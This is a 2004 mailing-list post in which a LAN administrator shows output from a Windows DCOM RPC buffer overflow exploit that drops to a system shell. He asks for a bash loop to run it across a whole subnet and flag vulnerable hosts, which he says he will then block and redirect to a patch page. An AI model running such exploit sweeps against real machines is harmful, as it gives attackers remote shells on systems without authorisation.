Date:      Tue, 16 Mar 2004 01:40:51 +0200
From:      hugle <hugle@vkt.lt>
To:        freebsd-questions@freebsd.org
Subject:   Need bash help
Message-ID:  <130471393648.20040316014051@vkt.lt>

Hello all.
I'm writing here because I think people here can help me.
(P.S. I didn't find any bash mailing lists.)

So here's what I'm planning to do. I have a big LAN here, and noticed that lots of users are still exploitable using RPC.

I've just found the source of this exploit, compiled it, and tried to use it - it works.

What I'm planning to do is automatically detect such (exploitable) users.

So I run:
ftp# ./dc IP
and get: 
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e626ba
- Dropping to System Shell...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

END.
So if there is text like '- Dropping to System Shell...', it means that the system is vulnerable. Otherwise it returns:
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e626ba
- Exploit appeared to have failed.



So what I want to do is something like:

for i in `seq 1 254`; do
./dc 192.168.1.$i
and if it returns 'Dropping to system shell' then add this IP to vulnerable_users
done

After that I'm planning to block those users on my router, and forward them to a web page with an explanation of how to fix that bug.

Thanks for help in advance
Jarek




